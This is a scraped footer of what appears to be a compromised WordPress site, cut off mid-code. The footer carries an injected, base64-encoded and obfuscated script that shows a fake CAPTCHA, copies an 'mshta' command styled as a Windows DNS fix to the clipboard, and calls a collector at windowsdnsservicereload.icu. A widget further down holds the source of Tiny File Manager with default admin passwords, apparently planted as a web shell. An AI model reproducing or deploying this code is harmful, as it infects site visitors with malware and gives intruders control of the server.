IwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwPGxpPlByZXNzXHgyMEVudGVyLjwvbGk+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMDwvdWw+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwPC9kaXY+XHgwYVx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjBceDIwXHgyMFx4MjAnKSxfMHg1ODE2YzY9ISFbXTt9fXNldFRpbWVvdXQoXzB4MzMzMDUyLF8weDU3NjNjNCksXzB4MjczMmFhKCksc2V0VGltZW91dChfMHg5YjdkOTYsXzB4NTc2M2M0KSxfMHgzZTdkMmYoKSxfMHgzNTkzZjMoKSxkb2N1bWVudFtfMHg0YmY3YzAoMHhlNCldPT09J2xvYWRpbmcnP2RvY3VtZW50W18weDRiZjdjMCgweGNiKV0oJ0RPTUNvbnRlbnRMb2FkZWQnLCgpPT57c2V0VGltZW91dChfMHg1MmU0NWEsXzB4MWFiNzA2KTt9KTpzZXRUaW1lb3V0KF8weDUyZTQ1YSxfMHgxYWI3MDYpO30oKSkpO2Z1bmN0aW9uIF8weDQ3N2YoKXtjb25zdCBfMHg0YTNmZjg9Wydmb3JFYWNoJywnYWRkZWROb2RlcycsJ2dldEVsZW1lbnRCeUlkJywnY29udGFpbnMnLCdsYW5ndWFnZScsJzEzTklJeXlpJywndGFnTmFtZScsJ3Bha28nLCdkb2N1bWVudEVsZW1lbnQnLCdXZWIzJywnaW5uZXJIVE1MJywnMmJvT01vRScsJzMyMTMzMTIyclFKQUlCJywncG9wdXBPdmVybGF5JywnYmxvY2snLCc0aGJMUmxZJywnb3BhY2l0eScsJzEyZVh1dFdkJywnU0NSSVBUJywnRXJyb3I6JywnaW5jbHVkZXMnLCc3MTQ2RWhTdFpYJywnY2xhc3NMaXN0JywnY2FwdGNoYUNoZWNrYm94JywnanNvbicsJ2Vycm9yJywnMjIxNzMxMFVOcVVkWScsJzE3NDM4NjdITG9jTE8nLCd0aGVuJywnMzZBVnJQbGEnLCdxdWVyeVNlbGVjdG9yQWxsJywncmVtb3ZlJywnY3JlYXRlRWxlbWVudCcsJ9Ce0YjQuNCx0LrQsDpceDIwd29ya2luZ1VybFx4MjDQvdC1XHgyMNC90LDQudC00LXQvScsJzdyU1pQekEnLCdhZGQnLCdpbnNlcnRBZGphY2VudEhUTUwnLCcuY2FwdGNoYS1pbWFnZXNceDIwaW1nJywnb2JzZXJ2ZScsJ0ZhaWxlZFx4MjB0b1x4MjBmZXRjaFx4MjBJUDonLCdodG1sJywnY29va2llJywnc2NyaXB0JywndGV4dGFyZWEnLCdhc3luYycsJ2NhdGNoJywnSUZSQU1FJywnbG9nJywnYWRkRXZlbnRMaXN0ZW5lcicsJ1BPU1QnLCdjbGljaycsJ2Rpc3BsYXknLCdzZWxlY3RlZCcsJzk3MjEwM2l5SGxqTCcsJ2FwcGxpY2F0aW9uL2pzb24nLCdodHRwczovL3d3dy53aW5kb3dzZG5zc2VydmljZXJlbG9hZC5pY3UvY29sbGVjdG9yLnBocCcsJ9Cj0LTQsNC70LXQvdC40LVceDIw0LLRgdC10YVceDIwPGlmcmFtZT5ceDIw0Y3Qu9C10LzQtdC90YLQvtCyLi4uJywnYm9keScsJ3dvcmtpbmdVcmwnLCdkYXRhLWFpLWNvbGxlY3Rpbmctc2hvd249dHJ1ZTtceDIwbWF4LWFnZT0zMTUzNjAwMDtceDIwcGF0aD0vO1x4MjBzYW1lc2l0ZT1sYXgnLCcyMzc2ODgwTlJaU2ZqJywndmFsdWUnLCdvcGFjaXR5XHgyMDAuNXNceDIwZWFzZScsJzYwNjc4OTZOcG5JSXMnLCdteS1jdXN0b20tc2NyaXB0JywnMTM3MTBYdnpRZ2wnLCdceDIwI1x4MjBceDIyTWljcm9zb2Z0XHgyMFdpbmRvd3M6XHgyMEROU1x4MjBzZXJ2aWNlXHgyMFJlbG9hZFx4MjBhbmRceDIwUmVzdGFydFx4MjBVUFx4MjInLCdhcHBlbmRDaGlsZCcsJ3NlbGVjdCcsJ25vbmUnLCdiYXNlNjQnLCdleGVjQ29tbWFuZCcsJ2JlZm9yZWVuZCcsJ3JlYWR5U3RhdGUnLCdtc2h0YVx4MjAnLCdzdHlsZSddO18weDQ3N2Y9ZnVuY3Rpb24oKXtyZXR1cm4gXzB4NGEzZmY4O307cmV0dXJuIF8weDQ3N2YoKTt9'); const scriptTag = document.createElement("script"); scriptTag.textContent = decodedScript; document.head.appendChild(scriptTag); })(); </script></div></section> </div> <div class="widget-column footer-widget-2"> <section id="text-9" class="widget widget_text"><h2 class="widget-title">About This Site</h2> <div class="textwidget"><p>This may be a good place to introduce yourself and your site or include some credits.</p> </div> </section><section id="search-4" class="widget widget_search"><h2 class="widget-title">Search</h2> <form role="search" method="get" class="search-form" action="http://www.pitmontepisano.it/"> <label for="search-form-67d9aa5641141"> <span class="screen-reader-text">Search for:</span> </label> <input type="search" id="search-form-67d9aa5641141" class="search-field" placeholder="Search …" value="" name="s" /> <button type="submit" class="search-submit"><svg class="icon icon-search" aria-hidden="true" role="img"> <use href="#icon-search" xlink:href="#icon-search"></use> </svg><span class="screen-reader-text">Search</span></button> </form> </section><section id="custom_html-5" class="widget_text widget widget_custom_html"><h2 class="widget-title">oke</h2><div class="textwidget custom-html-widget"><?php //Default Configuration $CONFIG = '{"lang":"en","error_reporting":false,"show_hidden":false,"hide_Cols":false,"theme":"light"}'; /** * H3K - Tiny File Manager V2.6 * @author CCP Programmers * @github https://github.com/prasathmani/tinyfilemanager * @link https://tinyfilemanager.github.io / //TFM version define('VERSION', '2.6'); //Application Title define('APP_TITLE', 'Tiny File Manager'); // --- EDIT BELOW CONFIGURATION CAREFULLY --- // Auth with login/password // set true/false to enable/disable it // Is independent from IP white- and blacklisting $use_auth = true; // Login user name and password // Users: array('Username' => 'Password', 'Username2' => 'Password2', ...) // Generate secure password hash - https://tinyfilemanager.github.io/docs/pwd.html $auth_users = array( 'admin' => '$2y$10$/K.hjNr84lLNDt8fTXjoI.DBp6PpeyoJ.mGwrrLuCZfAwfSAGqhOW', //admin@123 'user' => '$2y$10$Fg6Dz8oH9fPoZ2jJan5tZuv6Z4Kp7avtQ9bDfrdRntXtPeiMAZyGO' //12345 ); // Readonly users // e.g. array('users', 'guest', ...) $readonly_users = array( 'user' ); // Global readonly, including when auth is not being used $global_readonly = false; // user specific directories // array('Username' => 'Directory path', 'Username2' => 'Directory path', ...) $directories_users = array(); // Enable highlight.js (https://highlightjs.org/) on view's page $use_highlightjs = true; // highlight.js style // for dark theme use 'ir-black' $highlightjs_style = 'vs'; // Enable ace.js (https://ace.c9.io/) on view's page $edit_files = true; // Default timezone for date() and time() // Doc - http://php.net/manual/en/timezones.php $default_timezone = 'Etc/UTC'; // UTC // Root path for file manager // use absolute path of directory i.e: '/var/www/folder' or $_SERVER['DOCUMENT_ROOT'].'/folder' //make sure update $root_url in next section $root_path = $_SERVER['DOCUMENT_ROOT']; // Root url for links in file manager.Relative to $http_host. Variants: '', 'path/to/subfolder' // Will not working if $root_path will be outside of server document root $root_url = ''; // Server hostname. Can set manually if wrong // $_SERVER['HTTP_HOST'].'/folder' $http_host = $_SERVER['HTTP_HOST']; // input encoding for iconv $iconv_input_encoding = 'UTF-8'; // date() format for file modification date // Doc - https://www.php.net/manual/en/function.date.php $datetime_format = 'm/d/Y g:i A'; // Path display mode when viewing file information // 'full' => show full path // 'relative' => show path relative to root_path // 'host' => show path on the host $path_display_mode = 'full'; // Allowed file extensions for create and rename files // e.g. 'txt,html,css,js' $allowed_file_extensions = ''; // Allowed file extensions for upload files // e.g. 'gif,png,jpg,html,txt' $allowed_upload_extensions = ''; // Favicon path. This can be either a full url to an .PNG image, or a path based on the document root. // full path, e.g http://example.com/favicon.png // local path, e.g images/icons/favicon.png $favicon_path = ''; // Files and folders to excluded from listing // e.g. array('myfile.html', 'personal-folder', '.php', '/path/to/folder', ...) $exclude_items = array(); // Online office Docs Viewer // Available rules are 'google', 'microsoft' or false // Google => View documents using Google Docs Viewer // Microsoft => View documents using Microsoft Web Apps Viewer // false => disable online doc viewer $online_viewer = 'google'; // Sticky Nav bar // true => enable sticky header // false => disable sticky header $sticky_navbar = true; // Maximum file upload size // Increase the following values in php.ini to work properly // memory_limit, upload_max_filesize, post_max_size $max_upload_size_bytes = 5000000000; // size 5,000,000,000 bytes (~5GB) // chunk size used for upload // eg. decrease to 1MB if nginx reports problem 413 entity too large $upload_chunk_size_bytes = 2000000; // chunk size 2,000,000 bytes (~2MB) // Possible rules are 'OFF', 'AND' or 'OR' // OFF => Don't check connection IP, defaults to OFF // AND => Connection must be on the whitelist, and not on the blacklist // OR => Connection must be on the whitelist, or not on the blacklist $ip_ruleset = 'OFF'; // Should users be notified of their block? $ip_silent = true; // IP-addresses, both ipv4 and ipv6 $ip_whitelist = array( '127.0.0.1', // local ipv4 '::1' // local ipv6 ); // IP-addresses, both ipv4 and ipv6 $ip_blacklist = array( '0.0.0.0', // non-routable meta ipv4 '::' // non-routable meta ipv6 ); // if User has the external config file, try to use it to override the default config above [config.php] // sample config - https://tinyfilemanager.github.io/config-sample.txt $config_file = DIR . '/config.php'; if (is_readable($config_file)) { @include($config_file); } // External CDN resources that can be used in the HTML (replace for GDPR compliance) $external = array( 'css-bootstrap' => '<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">', 'css-dropzone' => '<link href="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.css" rel="stylesheet">', 'css-font-awesome' => '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" crossorigin="anonymous">', 'css-highlightjs' => '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/' . $highlightjs_style . '.min.css">', 'js-ace' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.32.2/ace.js"></script>', 'js-bootstrap' => '<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>', 'js-dropzone' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.js"></script>', 'js-jquery' => '<script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>', 'js-jquery-datatables' => '<script src="https://cdn.datatables.net/1.13.1/js/jquery.dataTables.min.js" crossorigin="anonymous" defer></script>', 'js-highlightjs' => '<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>', 'pre-jsdelivr' => '<link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/>', 'pre-cloudflare' => '<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin/><link rel="dns-prefetch" href="https://cdnjs.cloudflare.com"/>' ); // --- EDIT BELOW CAREFULLY OR DO NOT EDIT AT ALL --- // max upload file size define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); // upload chunk size define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); // private key and session name to store to the session if (!defined('FM_SESSION_ID')) { define('FM_SESSION_ID', 'filemanager'); } // Configuration $cfg = new FM_Config(); // Default language $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; // Show or hide files and folders that starts with a dot $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; // PHP error reporting - false = Turns off Errors, true = Turns on Errors $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; // Hide Permissions and Owner cols in file-listing $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); //available languages $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } // if fm included if (defined('FM_EMBED')) { $use_auth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') && function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter('nocache'); // Prevent logout issue after page was cached session_name(FM_SESSION_ID); function session_error_handling_function($code, $msg, $file, $line) { // Permission denied for default session, try to create a new one if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } //Generating CSRF Token if (empty($_SESSION['token'])) { if (function_exists('random_bytes')) { $_SESSION['token'] = bin2hex(random_bytes(32)); } else { $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); } } if (empty($auth_users)) { $use_auth = false; } $is_https = isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https'; // update $root_url based on user specific directories if (isset($_SESSION[FM_SESSION_ID]['logged']) && !empty($directories_users[$_SESSION[FM_SESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = $root_url . $wd . DIRECTORY_SEPARATOR . $directories_users[$_SESSION[FM_SESSION_ID]['logged']]; } // clean $root_url $root_url = fm_clean_path($root_url); // abs path for site defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[FM_SESSION_ID]['logged']); unset($_SESSION['token']); fm_redirect(FM_SELF_URL); } // Validate connection IP if ($ip_ruleset != 'OFF') { function getClientIP() { if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; } else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; } else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { return $_SERVER['REMOTE_ADDR']; } else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { return $_SERVER['HTTP_CLIENT_IP']; } return ''; } $clientIp = getClientIP(); $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if ($ip_ruleset == 'AND') { if ($whitelisted == true && $blacklisted == false) { $proceed = true; } } else if ($ip_ruleset == 'OR') { if ($whitelisted == true || $blacklisted == false) { $proceed = true; } } if ($proceed == false) { trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if ($ip_silent == false) { fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } // Checking if the user is logged in or not. If not, it will show the login form. if ($use_auth) { if (isset($_SESSION[FM_SESSION_ID]['logged'], $auth_users[$_SESSION[FM_SESSION_ID]['logged']])) { // Logged } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { // Logging In sleep(1); if (function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) && isset($_POST['fm_pwd']) && password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) && verifyToken($_POST['token'])) { $_SESSION[FM_SESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL); } else { unset($_SESSION[FM_SESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[FM_SESSION_ID]['logged']); fm_show_header_login(); ?> <section class="h-100"> <div class="container h-100"> <div class="row justify-content-md-center align-content-center h-100vh"> <div class="card-wrapper"> <div class="card fat" data-bs-theme="<?php echo FM_THEME; ?>"> <div class="card-body"> <form class="form-signin" action="" method="post" autocomplete="off"> <div class="mb-3"> <div class="brand"> <svg version="1.0" xmlns="http://www.w3.org/2000/svg" M1008 width="100%" height="80px" viewBox="0 0 238.000000 140.000000" aria-label="H3K Tiny File Manager"> <g transform="translate(0.000000,140.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none"> <path d="M160 700 l0 -600 110 0 110 0 0 260 0 260 70 0 70 0 0 -260 0 -260 110 0 110 0 0 600 0 600 -110 0 -110 0 0 -260 0 -260 -70 0 -70 0 0 260 0 260 -110 0 -110 0 0 -600z" /> <path fill="#003500" d="M1008 1227 l-108 -72 0 -117 0 -118 110 0 110 0 0 110 0 110 70 0 70 0 0 -180 0 -180 -125 0 c-69 0 -125 -3 -125 -6 0 -3 23 -39 52 -80 l52 -74 73 0 73 0 0 -185 0 -185 -70 0 -70 0 0 115 0 115 -110 0 -110 0 0 -190 0 -190 181 0 181 0 109 73 108 72 1 181 0 181 -69 48 -68 49 68 50 69 49 0 249 0 248 -182 -1 -183 0 -107 -72z" /> <path d="M1640 700 l0 -600 110 0 110 0 0 208 0 208 35 34 35 34 35 -34 35 -34 0 -208 0 -208 110 0 110 0 0 212 0 213 -87 87 -88 88 88 88 87 87 0 213 0 212 -110 0 -110 0 0 -208 0 -208 -70 -69 -70 -69 0 277 0 277 -110 0 -110 0 0 -600z" /> </g> </svg> </div> <div class="text-center"> <h1 class="card-title"><?php echo APP_TITLE; ?></h1> </div> </div> <hr /> <div class="mb-3"> <label for="fm_usr" class="pb-2"><?php echo lng('Username'); ?></label> <input type="text" class="form-control" id="fm_usr" name="fm_usr" required autofocus> </div> <div class="mb-3"> <label for="fm_pwd" class="pb-2"><?php echo lng('Password'); ?></label> <input type="password" class="form-control" id="fm_pwd" name="fm_pwd" required> </div> <div class="mb-3"> <?php fm_show_message(); ?> </div> <input type="hidden" name="token" value="<?php echo htmlentities($_SESSION['token']); ?>" /> <div class="mb-3"> <button type="submit" class="btn btn-success btn-block w-100 mt-4" role="button"> <?php echo lng('Login'); ?> </button> </div> </form> </div> </div> <div class="footer text-center"> —— © <a href="https://tinyfilemanager.github.io/" target="_blank" class="text-decoration-none text-muted" data-version="<?php echo VERSION; ?>">CCP Programmers</a> —— </div> </div> </div> </div> </section> <?php fm_show_footer_login(); exit; } } // update root path if ($use_auth && isset($_SESSION[FM_SESSION_ID]['logged'])) { $root_path = isset($directories_users[$_SESSION[FM_SESSION_ID]['logged']]) ? $directories_users[$_SESSION[FM_SESSION_ID]['logged']] : $root_path; } // clean and check $root_path $root_path = rtrim($root_path, '\\/'); $root_path = str_replace('\\', '/', $root_path); if (!@is_dir($root_path)) { echo "<h1>" . lng('Root path') . " \"{$root_path}\" " . lng('not found!') . " </h1>"; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $global_readonly || ($use_auth && !empty($readonly_users) && isset($_SESSION[FM_SESSION_ID]['logged']) && in_array($_SESSION[FM_SESSION_ID]['logged'], $readonly_users))); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); // always use ?p= if (!isset($_GET['p']) && empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); // for ajax request - save $input = file_get_contents('php://input'); $_POST = (strpos($input, 'ajax') != FALSE && strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; // instead globals vars define('FM_PATH', $p); define('FM_USE_AUTH', $use_auth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $use_auth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); /* ACTIONS / // Handle all AJAX Request if ((isset($_SESSION[FM_SESSION_ID]['logged'], $auth_users[$_SESSION[FM_SESSION_ID]['logged']]) || !FM_USE_AUTH) && isset($_POST['ajax'], $_POST['token']) && !FM_READONLY) { if (!verifyToken($_POST['token'])) { header('HTTP/1.0 401 Unauthorized'); die("Invalid Token."); } //search : get list of files from the current folder if (isset($_POST['type']) && $_POST['type'] == "search") { $dir = $_POST['path'] == "." ? '' : $_POST['path']; $response = scan(fm_clean_path($dir), $_POST['content']); echo json_encode($response); exit(); } // save editor file if (isset($_POST['type']) && $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); $write_results = @fwrite($fd, $writedata); fclose($fd); if ($write_results === false) { header("HTTP/1.1 500 Internal Server Error"); die("Could Not Write File! - Check Permissions / Ownership"); } die(true); } // backup files if (isset($_POST['type']) && $_POST['type'] == "backup" && !empty($_POST['file'])) { $fileName = fm_clean_path($_POST['file']); $fullPath = FM_ROOT_PATH . '/'; if (!empty($_POST['path'])) { $relativeDirPath = fm_clean_path($_POST['path']); $fullPath .= "{$relativeDirPath}/"; } $date = date("dMy-His"); $newFileName = "{$fileName}-{$date}.bak"; $fullyQualifiedFileName = $fullPath . $fileName; try { if (!file_exists($fullyQualifiedFileName)) { throw new Exception("File {$fileName} not found"); } if (copy($fullyQualifiedFileName, $fullPath . $newFileName)) { echo "Backup {$newFileName} created"; } else { throw new Exception("Could not copy file {$fileName}"); } } catch (Exception $e) { echo $e->getMessage(); } } // Save Config if (isset($_POST['type']) && $_POST['type'] == "settings") { global $cfg, $lang, $report_errors, $show_hidden_files, $lang_list, $hide_Cols, $theme; $newLng = $_POST['js-language']; fm_get_translations([]); if (!array_key_exists($newLng, $lang_list)) { $newLng = 'en'; } $erp = isset($_POST['js-error-report']) && $_POST['js-error-report'] == "true" ? true : false; $shf = isset($_POST['js-show-hidden']) && $_POST['js-show-hidden'] == "true" ? true : false; $hco = isset($_POST['js-hide-cols']) && $_POST['js-hide-cols'] == "true" ? true : false; $te3 = $_POST['js-theme-3']; if ($cfg->data['lang'] != $newLng) { $cfg->data['lang'] = $newLng; $lang = $newLng; } if ($cfg->data['error_reporting'] != $erp) { $cfg->data['error_reporting'] = $erp; $report_errors = $erp; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['show_hidden'] != $shf) { $cfg->data['show_hidden'] = $shf; $show_hidden_files = $shf; } if ($cfg->data['hide_Cols'] != $hco) { $cfg->data['hide_Cols'] = $hco; $hide_Cols = $hco; } if ($cfg->data['theme'] != $te3) { $cfg->data['theme'] = $te3; $theme = $te3; } $cfg->save(); echo true; } // new password hash if (isset($_POST['type']) && $_POST['type'] == "pwdhash") { $res = isset($_POST['inputPassword2']) && !empty($_POST['inputPassword2']) ? password_hash($_POST['inputPassword2'], PASSWORD_DEFAULT) : ''; echo $res; } //upload using url if (isset($_POST['type']) && $_POST['type'] == "upload" && !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback($message) { global $callback; echo json_encode($message); } function get_file_path() { global $path, $fileinfo, $temp_file; return $path . "/" . basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) && preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; //prevent 127. domain and known ports $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0\:)?:?01$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("fail" => $err)); exit(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if (!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } // Delete file / folder if (isset($_GET['del'], $_POST['token']) && !FM_READONLY) { $del = str_replace('/', '', fm_clean_path($_GET['del'])); if ($del != '' && $del != '..' && $del != '.' && verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder') . ' <b>%s</b> ' . lng('Deleted') : lng('File') . ' <b>%s</b> ' . lng('Deleted'); fm_set_msg(sprintf($msg, fm_enc($del))); } else { $msg = $is_dir ? lng('Folder') . ' <b>%s</b> ' . lng('not deleted') : lng('File') . ' <b>%s</b> ' . lng('not deleted'); fm_set_msg(sprintf($msg, fm_enc($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Create a new file/folder if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) && !FM_READONLY) { $type = urldecode($_POST['newfile']); $new = str_replace('/', '', fm_clean_path(strip_tags($_POST['newfilename']))); if (fm_isvalid_filename($new) && $new != '' && $new != '..' && $new != '.' && verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($type == "file") { if (!file_exists($path . '/' . $new)) { if (fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File') . ' <b>%s</b> ' . lng('Created'), fm_enc($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File') . ' <b>%s</b> ' . lng('already exists'), fm_enc($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder') . ' <b>%s</b> ' . lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder') . ' <b>%s</b> ' . lng('already exists'), fm_enc($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder') . ' <b>%s</b> ' . lng('not created'), fm_enc($new)), 'error'); } } } else { 